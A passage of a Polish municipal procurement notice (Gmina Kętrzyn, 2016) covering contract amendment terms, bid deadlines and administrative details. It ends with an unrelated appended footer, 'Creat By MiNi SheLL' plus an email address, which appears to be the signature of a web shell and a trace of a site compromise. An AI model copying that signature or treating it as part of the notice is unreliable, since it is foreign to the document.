<p>1.  Wszystkie zmiany warunków niniejszej umowy, pod rygorem nieważności, wymagają formy pisemnej w postaci aneksu podpisanego przez obie strony umowy i mogą być dokonane z zastrzeżeniem art. 144 ust.1 ustawy z dnia 29 stycznia 2004 r. - Prawo  zamówień publicznych  (Dz. U. z  2015 r. poz. 2164).
                                 2. Zamawiający dopuszcza istotne zmiany postanowień zawartej umowy w stosunku do treści
                                     oferty, na  podstawie której dokonano wyboru Wykonawcy, w następujących zakresach:
                                                                                     
1)  zmiany dokumentacji projektowej, jeżeli jest to niezbędne dla prawidłowego wykonania
     przedmiotu umowy lub uzasadnione ze względów technicznych lub użytkowych;       
2)  zmiany harmonogramu rzeczowo-finansowego robót, jeżeli :
     - nie koliduje to z możliwością zapewnienia prawidłowego finansowania zamówienia
       przez Zamawiającego,
     - nie wynika to z opóźnień w realizacji zamówienia, spowodowanych okolicznościami
       leżącymi po stronie Wykonawcy,                                                                       
3) zmiany terminu realizacji zamówienia, w przypadku:
                       a)   siły wyższej- zdarzenie zewnętrzne, niemożliwe do przewidzenia i niemożliwe do
                              zapobieżenia, uniemożliwiające realizację zamówienia; 
        b)   czasu trwania procedur administracyjnych, mającego wpływ  obiektywny,
              niewynikający z opieszałości Wykonawcy, na termin wykonania  zamówienia;       
        c)   wystąpienia    konieczności    wykonania    robót    dodatkowych    lub   zamiennych,
              udzielenia    zamówień dodatkowych lub uzupełniających, jeżeli te roboty lub
              zamówienia wstrzymują lub opóźniają realizację przedmiotu umowy;  
        d)   konieczności  przebudowy    przyłączy i sieci : energetycznych, telekomunikacyj-
              nych, wodociągowych, gazowych przez  dysponentów  tych  mediów , jeżeli prace
              te kolidują z pracami objętymi niniejszą umową;
         e)   wprowadzenia   zmian   w   dokumentacji   projektowej   lub specyfikacjach
              technicznych ,  będących  podstawą  realizacji  przedmiotu  umowy, jeżeli wprowa-  
              dzenie zmian wpływa na termin realizacji zamówienia;   
        f)   zmiany harmonogramu rzeczowo-finansowego robót, mającej wpływ na termin 
              realizacji zamówienia;      
4)  zmiany wynagrodzenia Wykonawcy, w przypadku:
        a)   zmiany urzędowej stawki podatku od towarów i usług (VAT)- zmiana wynagrodze-
              nia o różnicę w kwocie podatku Vat;
        b)   zmiany wysokości minimalnego wynagrodzenia za pracę ustalonego na podstawie
              art.2 ust.3-5 ustawy z dnia 10.10.2002r. o minimalnym wynagrodzeniu za pracę,
              jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wyko-
              nawcę;
        c)   zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdowotne-
              mu lub wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne, jeżeli 
              zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę;
        d)   wprowadzenia   robót   zamiennych lub zmniejszenia zakresu zamówienia, zgodnie 
             z § 1 ust.3 i 4 umowy - wynagrodzenie Wykonawcy zostanie zmniejszone o wartość
             robót niewykonanych, określoną na podstawie kosztorysu ofertowego przekazanego
             przez Wykonawcę Zamawiającemu przed podpisaniem  umowy.

     W przypadku wnioskowania o zmianę wynagrodzenia w okolicznościach, określonych
     w pkt 4 lit. b i c, Wykonawca zobowiązany będzie wykazać wpływ określonych 
     zmian na koszty wykonania zamówienia przez Wykonawcę, a w szczególności przedsta-
     wić kalkulację kosztów pracy z oferty oraz kosztów pracy uwzględniających określone
     wyżej zmiany, w odniesieniu do ilości pracowników zatrudnionych przy realizacji 
     zamówienia, ilości przepracowywanych przez tych pracowników roboczogodzin oraz
     rodzajów posiadanych przez nich umów.

3.  W   przypadku   zmiany   terminu   wykonania   przedmiotu   umowy   wykonawca,   który   wniósł zabezpieczenie  należytego  wykonania  umowy  w  formie  innej  niż  pieniądz  zobowiązany  jest, na własny koszt,  do przedłużenia terminu jego ważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gminaketrzyn.pl/zamowienia_publiczne/110/status/rodzaj/wzp/zwr/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.08.2016 godzina 10:00, miejsce: Urząd Gminy Kętrzyn
ul. Kościuszki 2
11-400 Kętrzyn

pok.16.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający nie przewiduje zawarcia umowy ramowej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com